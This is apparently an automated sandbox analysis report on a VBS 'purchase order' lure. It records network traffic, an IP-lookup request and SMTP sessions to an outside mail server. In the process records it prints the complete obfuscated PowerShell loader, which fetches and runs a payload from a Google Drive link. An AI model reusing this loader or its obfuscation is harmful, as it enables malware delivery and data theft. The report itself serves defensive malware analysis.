                                                                                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt
                                                                                Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                Accept-Ranges: bytes
                                                                                Content-Length: 249920
                                                                                Last-Modified: Mon, 22 Apr 2024 06:47:46 GMT
                                                                                Date: Tue, 23 Apr 2024 06:05:33 GMT
                                                                                Expires: Tue, 23 Apr 2024 06:05:33 GMT
                                                                                Cache-Control: private, max-age=0
                                                                                X-Goog-Hash: crc32c=XTS7hQ==
                                                                                Server: UploadServer
                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                Connection: close
                                                                                2024-04-23 06:05:33 UTC4747INData Raw: bb f6 89 5b f1 91 0d 40 e1 83 47 68 d9 e8 84 fd 14 e2 65 70 d6 c5 cb ba 6f 14 d4 83 3f f1 06 25 02 9b d7 e1 98 ef 4f 64 13 26 6e 0b 4e fc 62 b1 07 2b 72 17 99 2e ac 52 be 1d d9 8a f5 e7 9c 05 98 70 68 0a 1f 26 f8 ec c2 fe 90 63 c9 25 8c d4 a5 d7 22 87 5b 08 b0 e6 11 00 74 30 17 3b 9b e9 dd 93 c8 27 4c 8b dc e6 2f e9 c3 d4 ea 54 c6 24 04 8f 81 f6 c3 28 5e eb 6c 46 15 ca f1 66 fe 40 3d f4 dc 0b 38 16 0a 20 e9 51 87 9e 61 b1 0d a7 03 90 76 96 83 4c 91 e0 53 2e cc 5d fd 1a 9d a4 48 9e d5 83 81 5d 01 68 a5 48 7a 57 ef 05 02 24 24 e2 63 21 4e db df 9b 9e b9 5e 70 f7 13 3d 29 8f 6e f2 79 17 0d 3b d9 37 e1 76 fc 01 8e 0e 31 32 3e 70 02 71 70 0a 31 d4 9e 1e 5e 76 a2 78 c1 89 40 ba 26 dd b2 5b 6a 34 4d 32 c7 05 4d 8d 67 91 38 6a 18 e3 95 02 08 8b eb 4b f6 44 d8 f0
                                                                                Data Ascii: [@Ghepo?%Od&nNb+r.Rph&c%"[t0;'L/T$(^lFf@=8 QavLS.]H]hHzW$$c!N^p=)ny;7v12>pqp1^vx@&[j4M2Mg8jKD
                                                                                2024-04-23 06:05:33 UTC4747INData Raw: 63 78 11 e5 b1 24 2e 0a bf f1 9d f0 52 0b e8 40 dd a3 07 74 d1 7c d4 2e cf e3 a4 47 61 b7 eb bd 36 e4 90 b4 b9 e1 fc a2 40 b5 0b 0a 66 ea 44 72 41 49 65 f4 78 47 21 b2 c6 96 9d a5 56 e9 7c 79 63 04 3d fa 02 a7 47 f4 0b 44 b8 b9 64 3c 23 11 9e d1 57 2b 3c c1 cf e6 d9 4f 4f 3c 6e 2d c1 8c 22 99 59 a2 25 c0 44 16 d1 57 3f 44 43 8f c9 e2 87 57 fc 5b 4f 2e 34 3c e9 88 54 d8 51 bf 77 c0 08 39 2d 50 3c d3 9a 32 ee 80 51 98 47 15 fa dc d3 14 61 e3 d2 24 01 06 bb c3 4c f7 c1 9b ac d0 94 b6 08 68 cb f2 54 3c 0c 4f 6b e4 cf b5 ac 28 8d 33 4c b0 b7 d2 c4 b2 e5 63 7d 61 e7 d8 3e f1 78 f7 88 ad 31 0b e0 31 b8 47 e9 d4 0e 70 bc 70 bc 0b c7 79 06 1e 5d 69 96 bf 48 03 ea c9 f1 5d 45 fe e8 62 c0 24 33 ae 16 eb 12 2a d8 ef d0 46 3e 6e 9f be 24 c8 1b 0e 0b d0 a9 9d 9b fd 31
                                                                                Data Ascii: cx$.R@t|.Ga6@fDrAIexG!V|yc=GDd<#W+<OO<n-"Y%DW?DCW[O.4<TQw9-P<2QGa$LhT<Ok(3Lc}a>x11Gppy]iH]Eb$3*F>n$1
                                                                                2024-04-23 06:05:33 UTC461INData Raw: be 21 67 b3 2a 67 70 b3 d3 d1 47 0d 0d 31 dd 8c 6c 08 63 09 d9 b6 65 ee 15 5c a1 bb 5d e3 03 b1 d4 f9 1e 13 40 90 65 c4 71 05 c8 31 fd 5e a3 ae 25 b7 16 8c 0d df 5f 28 d2 5f 4a df 0b 5b 3b b1 de c7 ef 70 1c f1 d9 35 57 63 34 89 43 4c 7a 6c 1e b9 95 0a 17 4c c8 cd 11 8b 4b c4 e1 54 ad a6 9e cf 49 f4 4f d2 c3 bb df 58 f0 af 47 79 f9 77 1f 92 ea ca 6d fb 8e d4 e3 e0 14 db 97 8c 9f af 7d c3 9b 5a f4 bd f6 41 a0 aa 00 40 b5 07 8d 54 de fb bf 12 1e 49 49 67 cb 70 74 c8 cc 19 d4 38 95 7a 0c b1 14 f5 8e 17 f8 d7 23 e7 b9 25 74 4e 4a 82 41 51 2a 8a c4 57 33 12 52 89 63 eb 17 5f a5 94 e5 83 c8 99 8e 28 ad 04 d7 c7 97 8b d7 4b 12 e1 29 58 73 91 79 ad bb 83 94 24 0c 98 cb 7f a6 31 6e 50 31 bf 2a 13 be a7 64 4f 83 66 ec a7 87 e5 cd da e0 8d 9b e3 6e 6a 94 2b 26 f8 0a
                                                                                Data Ascii: !g*gpG1lce\]@eq1^%_(_J[;p5Wc4CLzlLKTIOXGywm}ZA@TIIgpt8z#%tNJAQ*W3Rc_(K)Xsy$1nP1*dOfnj+&
                                                                                2024-04-23 06:05:33 UTC1255INData Raw: a8 df f7 ad 92 97 f5 a3 6a 64 0a b5 8f 61 4a c1 ad 1d d4 bd 06 f5 9a f8 96 9d 72 20 21 78 eb 58 0f 22 4a 36 2d b2 ee 4a 67 00 e3 e5 9c 5b 2a af a4 64 92 46 8a 10 d8 a1 51 50 ba 5b 7a 4e 58 c4 54 9d b6 b8 69 32 fb 3a 3a 70 b6 1e 42 b3 3c 0f a1 d2 a5 89 12 a9 9a 8f 5f 73 2a 08 74 fe a2 b2 36 bf 96 cc f9 ae 6d a7 ce 77 4f 36 00 1c ef e8 60 65 0e b8 f3 65 86 0b 17 2a d4 5c 7b 26 7c fb 50 70 31 e7 d9 6f 4f eb 45 06 d8 6c 16 78 9c a0 c1 c7 2d 99 62 73 95 fc 88 1f 81 23 96 ae 26 23 48 48 70 49 19 ff 8c e4 b5 fc 18 c9 a5 1b ed a1 90 cf fa bb 01 a4 ea 4f 0a 5e b8 35 5d 70 d3 4d b7 f5 f0 ce 09 76 f6 df e0 9d 93 66 66 25 56 4a 63 96 30 8d 4d 3f 69 75 70 d3 38 fd bb e3 4e 69 54 91 67 e3 a4 46 ae ef 91 fe b2 b1 dc f7 6a 69 da 96 51 be 17 4d 80 a3 91 b0 90 32 b2 69 27
                                                                                Data Ascii: jdaJr !xX"J6-Jg[*dFQP[zNXTi2::pB<_s*t6mwO6`ee*\{&|Pp1oOElx-bs#&#HHpIO^5]pMvff%VJc0M?iup8NiTgFjiQM2i'
                                                                                2024-04-23 06:05:33 UTC65INData Raw: 0e 6b b4 23 f6 93 cc 4d eb 3e bc 68 f3 cb 3c 40 b9 ea a1 2f 8a 0a 89 21 34 72 ab 4a 51 fa 48 b4 11 44 60 d6 2c 9d b9 b9 76 20 f7 13 37 d7 d1 21 f2 59 5d 0c 38 d9 cd c5 5e 9a 01 70 02 3d 32 1e 51
                                                                                Data Ascii: k#M>h<@/!4rJQHD`,v 7!Y]8^p=2Q
                                                                                2024-04-23 06:05:33 UTC1255INData Raw: 02 91 70 f6 31 e6 89 15 5e 76 9a 77 c8 89 27 eb 26 dd b8 a5 64 9a a8 11 e5 05 6d 8d 99 9f 34 6e 18 1d 99 4e 08 ab dc 4b f6 44 24 f1 e7 3c 9a e7 bb 88 3a 9f 1c 12 7a cf 47 ca 32 1e dd 1b 79 ac 53 80 a3 92 c7 56 ae 6a 64 f0 c6 cb 6d 4a b1 85 48 2a b3 0c 75 b4 dc 96 99 00 8c 2c 74 9b 70 b0 2e 46 3c 8d a2 ee 4a 63 8c 9f de 8a 2b 02 ee 5a 68 9c c6 b2 5d d8 a5 29 fc b7 53 0a 46 39 c4 54 97 c8 a7 65 32 ff b6 4b 7e b6 4e 6b f2 3c 0f 55 53 8e a9 12 ad e8 0c 54 73 5a f0 38 fe a2 ba 9e e9 96 cc f7 f4 79 a4 ce 0d 99 79 01 1c c5 6a 74 65 0e 42 eb e9 93 0b e9 22 aa 02 58 25 0c d3 12 8e 30 d4 43 79 4f eb bf 78 84 6f e8 04 b5 e2 ae 95 27 19 7f 8d 9b fb fa 5b 86 23 e6 86 9a 2d 44 42 f0 af 15 f3 88 b6 c4 fe 18 b9 73 5b d4 ba 9a 4f e3 45 0d a0 98 82 41 5e c8 1c 93 38 d3 47
                                                                                Data Ascii: p1^vw'&dm4nNKD$<:zG2ySVjdmJH*u,tp.F<Jc+Zh])SF9Te2K~Nk<USTsZ8yyjteB"X%0CyOxo'[#-DBs[OEA^8G
                                                                                2024-04-23 06:05:33 UTC1255INData Raw: 87 5b 08 4e e8 52 00 74 ce 1b 38 9b c9 db 93 c8 27 b2 8a e5 e3 2f e9 c3 ec ef 54 c6 24 3c 79 7f 09 3c 02 5e eb 6c 55 25 c9 71 7f ff 40 33 e1 66 05 29 82 03 ed c8 e9 78 dc af 90 61 ca 6b e3 56 e6 0f 2f f5 92 12 47 ec 3e 9c 8a f2 f2 1f be b7 e6 5f 26 74 06 f9 42 14 77 af b4 5d 06 49 73 0b 45 60 fe d0 91 ba 92 a0 7e f7 13 1d 2c df 2b f2 87 55 0f 38 d9 cd c7 51 9a 21 8d 0e 31 32 c0 71 3b 8e 70 08 30 21 93 14 5e 88 6d 7a c1 a1 13 ba 26 d7 c6 49 6a 9a aa cf c9 07 6d ad 63 91 38 6e e6 ed 96 42 08 75 c7 48 f6 64 df f0 de 32 64 e6 82 a6 2f 9d 1c ec 56 d7 47 34 3e e1 d3 57 38 ac ad 8c 8f 94 e7 75 ae 94 6a 0d c7 f2 9d 46 b2 85 7c d5 bd 0c 75 6a f9 af 8f 00 72 22 86 92 70 4e 59 29 3c ad b9 10 44 63 72 be e5 9c 2b 02 10 aa 67 98 c6 64 1c db a5 03 00 b9 5b 0a 98 18 fd
                                                                                Data Ascii: [NRt8'/T$<y<^lU%q@3f)xakV/G>_&tBw]IsE`~,+U8Q!12q;p0!^mz&Ijmc8nBuHd2d/VG4>W8ujF|ujr"pNY)<Dcr+gd[
                                                                                2024-04-23 06:05:33 UTC1255INData Raw: 73 58 f5 d7 9d 17 18 c9 4d 99 ca 4d 43 ca cc 19 2a cf 9b 7a 77 d2 ea f9 8a 2e 0d d5 23 e7 99 dd 75 77 52 7c 4f 52 02 b4 3a 5b 3a 7d 4d 81 63 e1 97 a7 a4 ad ef a3 cb 99 b6 9e 53 0a d7 e7 9e 75 db 4b ec cf 2e 58 73 6f 8b af 82 be 9e 24 0c e6 16 7e 9f 10 10 76 31 41 27 38 83 77 71 45 03 46 c4 e2 83 c5 c2 f2 a6 8d 65 e7 cb 7f 94 d5 28 06 04 1d 26 d8 e7 c6 fe 90 9d 38 d9 8c d4 e3 db 21 87 7b 0b b0 e6 51 fe 75 09 27 3b 9b e9 23 9f ca 27 6c 8b dd e6 2f b0 86 d2 ea 54 c6 78 fb 70 7e d8 3d d7 a1 d4 6c 46 15 f5 71 66 fe 1c cc 14 99 2b c6 5d fc cd cc e9 86 d2 52 9e 5a cf 6a 1d 5a e5 f1 03 f6 92 32 43 12 3f a5 7e f3 cb 3c be 97 e7 a1 2f 74 f8 8b 22 14 77 55 46 52 04 69 81 07 44 60 28 d3 a8 bf b9 5e 70 cf 16 3d 29 df 13 2c 84 a4 f3 46 80 33 cb 58 64 08 8f 0e cf 3b 3c
                                                                                Data Ascii: sXMMC*zw.#uwR|OR:[:}McSuK.Xso$~v1A'8wqEFe(&8!{Qu';#'l/Txp~=lFqf+]RZjZ2C?~</t"wUFRiD`(^p=),F3Xd;<
                                                                                2024-04-23 06:05:33 UTC1255INData Raw: 23 8d 55 e5 62 30 dc 9e 4d ec 2d 5f 21 bc 5d db 55 6e 23 06 34 13 be 9e 76 f4 73 fb 79 31 fd 7e a1 ae 25 a6 c8 8d 34 fd 5f d6 dc 21 6e e7 a2 5f 13 8d de 39 e9 0e 39 d1 d8 31 7f 5e ca 88 70 db 59 6c 1e 43 bc 0e 17 37 b9 33 1f 8f 24 f6 1f 58 ab 86 bc c9 49 f4 b1 22 c2 82 cc a6 fc af 39 51 fa 77 1b ab f9 cb 54 ec ae d3 e3 1e 1d 25 99 f7 ec af 83 cb f4 32 d4 bc fc 61 a4 54 01 79 58 09 8d 54 f6 29 b1 12 18 e9 4f 67 cb 74 aa cb f5 0e d4 c6 9b 84 05 b1 ea d9 8e 17 d8 d5 0b a2 b9 db 73 57 51 82 41 51 fc ba c4 57 39 83 61 89 63 c1 97 59 a5 94 1f a2 f2 93 8e 28 53 0a f7 c6 97 75 db b5 1c c1 2d 58 8d 9d 87 ac a2 9a 94 24 0c 18 e9 46 a3 35 10 76 09 ba 2e 3b 83 9f 36 ba fc bb c6 a7 83 c5 d3 ea e2 8d 85 ed 6e 6a 9a d5 2a e9 2a 1c 26 f8 ec 38 f0 92 63 0e 5b 8c d4 1d d7
                                                                                Data Ascii: #Ub0M-_!]Un#4vsy1~%4_!n_991^pYlC73$XI"9QwT%2aTyXT)OgtsWQAQW9acY(Su-X$F5v.;6nj**&8c[
                                                                                2024-04-23 06:05:33 UTC1255INData Raw: 8c 53 85 96 8d b1 de 26 a8 b5 4c f4 02 89 91 02 a9 66 ec ee fa 6e a9 6f e6 16 30 2e 06 cf 7f 14 06 a2 86 c0 5b 83 90 3f 5b 72 37 f3 b3 f4 ce 38 93 67 67 86 b2 78 2e 1e 8a ee 67 7d 74 66 ad 53 13 94 e1 9a 23 7c 76 9f 49 10 54 34 95 57 e1 2c 73 bb 4c 17 4f d1 b2 b7 99 c2 44 fb 70 f2 ba 33 4d 7f 85 03 49 fc c3 7c 48 ef 85 90 4e 45 ab 48 ff 36 c4 21 67 b3 2a 67 72 b1 d3 f1 be 01 0f 31 03 85 55 1b 63 f7 d8 a7 48 ec 15 5a 19 b9 5d e3 07 a9 3d 04 e1 ec 94 9e 65 c7 41 ff c4 96 ef 7e a0 af 25 b7 f9 ad 34 fd 5f 28 2c 2f 6e df 33 cc 01 8d de c7 1b 02 39 f1 f9 03 7f 5e 34 77 48 f5 53 6c 1e bd 9f 2e 24 4c c8 33 e1 85 4b c4 1f a6 a1 a6 be e9 45 f4 4f 2c 3c 83 f5 4f f0 af 39 8f f0 76 1b 8b 0e ca 6d fb ee 3c eb e0 14 05 94 8c 9f af 7d c1 9b 5a d4 42 fa 41 a0 74 51 79 a6
                                                                                Data Ascii: S&Lfno0.[?[r78ggx.g}tfS#|vIT4W,sLODp3MI|HNEH6!g*gr1UcHZ]=eA~%4_(,/n39^4wHSl.$L3KEO,<O9vm<}ZBAtQy


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                4192.168.2.549716104.26.13.205443320C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-04-23 06:05:38 UTC155OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                Host: api.ipify.org
                                                                                Connection: Keep-Alive
                                                                                2024-04-23 06:05:38 UTC211INHTTP/1.1 200 OK
                                                                                Date: Tue, 23 Apr 2024 06:05:38 GMT
                                                                                Content-Type: text/plain
                                                                                Content-Length: 14
                                                                                Connection: close
                                                                                Vary: Origin
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Server: cloudflare
                                                                                CF-RAY: 878ba9bc9b87422b-EWR
                                                                                2024-04-23 06:05:38 UTC14INData Raw: 31 35 34 2e 31 36 2e 31 39 32 2e 31 36 33
                                                                                Data Ascii: 154.16.192.163


                                                                                SMTP Packets

                                                                                TimestampSource PortDest PortSource IPDest IPCommands
                                                                                Apr 23, 2024 08:05:41.106796026 CEST5874971766.29.159.53192.168.2.5220 PrivateEmail.com prod Mail Node
                                                                                Apr 23, 2024 08:05:41.109792948 CEST49717587192.168.2.566.29.159.53EHLO 284992
                                                                                Apr 23, 2024 08:05:41.257242918 CEST5874971766.29.159.53192.168.2.5250-mta-12.privateemail.com
                                                                                250-PIPELINING
                                                                                250-SIZE 81788928
                                                                                250-ETRN
                                                                                250-AUTH PLAIN LOGIN
                                                                                250-ENHANCEDSTATUSCODES
                                                                                250-8BITMIME
                                                                                250-CHUNKING
                                                                                250 STARTTLS
                                                                                Apr 23, 2024 08:05:41.257411003 CEST49717587192.168.2.566.29.159.53STARTTLS
                                                                                Apr 23, 2024 08:05:41.404829025 CEST5874971766.29.159.53192.168.2.5220 Ready to start TLS
                                                                                Apr 23, 2024 08:05:43.856537104 CEST5874971866.29.159.53192.168.2.5220 PrivateEmail.com prod Mail Node
                                                                                Apr 23, 2024 08:05:43.856699944 CEST49718587192.168.2.566.29.159.53EHLO 284992
                                                                                Apr 23, 2024 08:05:44.004396915 CEST5874971866.29.159.53192.168.2.5250-mta-12.privateemail.com
                                                                                250-PIPELINING
                                                                                250-SIZE 81788928
                                                                                250-ETRN
                                                                                250-AUTH PLAIN LOGIN
                                                                                250-ENHANCEDSTATUSCODES
                                                                                250-8BITMIME
                                                                                250-CHUNKING
                                                                                250 STARTTLS
                                                                                Apr 23, 2024 08:05:44.004558086 CEST49718587192.168.2.566.29.159.53STARTTLS
                                                                                Apr 23, 2024 08:05:44.151839972 CEST5874971866.29.159.53192.168.2.5220 Ready to start TLS

                                                                                Statistics

                                                                                CPU Usage

                                                                                Click to jump to process

                                                                                Memory Usage

                                                                                Click to jump to process

                                                                                High Level Behavior Distribution

                                                                                Click to dive into process behavior distribution

                                                                                Behavior

                                                                                Click to jump to process

                                                                                System Behavior

                                                                                General

                                                                                Target ID:0
                                                                                Start time:08:04:51
                                                                                Start date:23/04/2024
                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Texas_Tool_Purchase_Order#T18834-1.vbs"
                                                                                Imagebase:0x7ff7561c0000
                                                                                File size:170'496 bytes
                                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:2
                                                                                Start time:08:04:51
                                                                                Start date:23/04/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLed.an.nised.chize ranrNonchnAmbide Miscs Ox,p= apis$ GudeSS,cleoSelvsc NunqiMa,heoTuf inPreinoPighemUnapps trkm.Fe ies,rydepUnm,sl StjfiUskoltmicro(Link $ KoncARuskunSrg.tsJibbokUnquaaCloudfProduf BesieBjarkl L stsPreeleRecipsHlifss BrneuAflevm VirtmSuggeeStellrOvicanAri neLvfal)Oxidi ');$Socionoms=$Aftalekalendernes[0];Infatuatedly (Preinterceded 'Eryth$F ivigIrritlS,illoP otobTuberaplankl Buc,:ChuzwhKedsoiBile t .isctDegage.ysteb St.la pmar .enenFortr= GuatNaposteRestpwSemia-E,terOKino,bPerlajOm edeStorhcdrawltPyope KnivsSNorfoyKapunsNon otIntegeAphi mF ran.SalpeNHovede dr.otSpace.Me,neWsyndieNonsebDiamaC L.scl I,veiPolyseS ilonAnusitEgafa ');Infatuatedly (Preinterceded ' Poly$UmttehLymphi Un.stSulphtUptowe Darwb .ortaBrincrUdestn.rogm.ProtaHOppreeunhinacha rd obs.eBruttr Nonvs Clea[Hool.$RandpS Overe .ccev OplaeHop,enHy rib,preyoRup cmEx.edmCommee TiptnfoliasDomin]Misen=Prefe$SangeI Fl,rnTankedCowtokEthnonFishbeMis ubM,llenRebelecemens Forh ');$Istandsat=Preinterceded 'Underhformaiuud rtKretjt Slriescincbp,ckeaFuldtrAn.canSubdi.Gono.DFraenoSorrewWildwn mganl lopoVa,slaBrei dReconFMisbiiCond,l ormoeRheol(Idio.$StarlSUnin.oudbrncsp seiSa,anoLuftanVandkoOverlmKalifsSe,ti,Conka$MalleKSmm,noAlpehgHaande ChurcVe.sehUngovoRettekRegiso Al.ilHi loaKanond Fod.e disls.ugle) Katt ';$Istandsat=$Boltant[1]+$Istandsat;$Kogechokolades=$Boltant[0];Infatuatedly (Preinterceded 'Pyrag$ Deklgsubf,lPar,ooBortlb Tilta omlalUncau: St.eKUr.erafor utCh,vyaFlod l IndfoAffalg Dem,sOo.enaA,atrlAgni,gAmtsr=Syvaa( flleTHyrenerabars Di otIn ra- Co.rP ,estaMassatProtohFirol Tvrr$Arm,nKMi pro AecigOverteOstl,c GynkhMic ro,ntiakPr.suota.telToleraRyatpd u.emeThorosDomme)Overv ');while (!$Katalogsalg) {Infatuatedly (Preinterceded 'Story$Wi,teg.lirtlPyelioYomasbKlappaKagenl,orfa:Ba isS The.ydekasdFixetsembe,yBegl.dAktivsKundetTi.sm=S.ele$PyrogtSy,efrDo,sauAuranePlati ') ;Infatuatedly $Istandsat;Infatuatedly (Preinterceded 'BenziS,andjtStorsaRehabrInerttTile.-SukkeSFil.plkvanteElgkeePo.yapMe al vangu4Unall ');Infatuatedly (Preinterceded 'tkk.l$Halvfg achilPu.esoM.nasbKultuaC,rkulPromo: CymrKLascaaHona tConsaa UdkilBruseohemidgChelos rangaCopollVitisgMelle=ambi ( InteTLuri,eContesCensotUnp.r-Un,erP ndeaFilmet OpsphBl,es Inte$ OverKErklroballagHjbaaeDissecGealah s enoEskalkCrownoPreinl Lysba Sar.d T icen,acis Frot)J,gte ') ;Infatuatedly (Preinterceded 'Besid$Im.erg Scoulma.iroAftrybNonadakontrl,rand:UlydiUKorsfnJere ipl,venE.sistNrbilePsychrRetirrA satuMetr pA tentOf.eniBallobEgenalOver,eBaand=Antep$U,gengVeikklCockhoRkefjbMi,roaVei ul Gylp:S,ineA 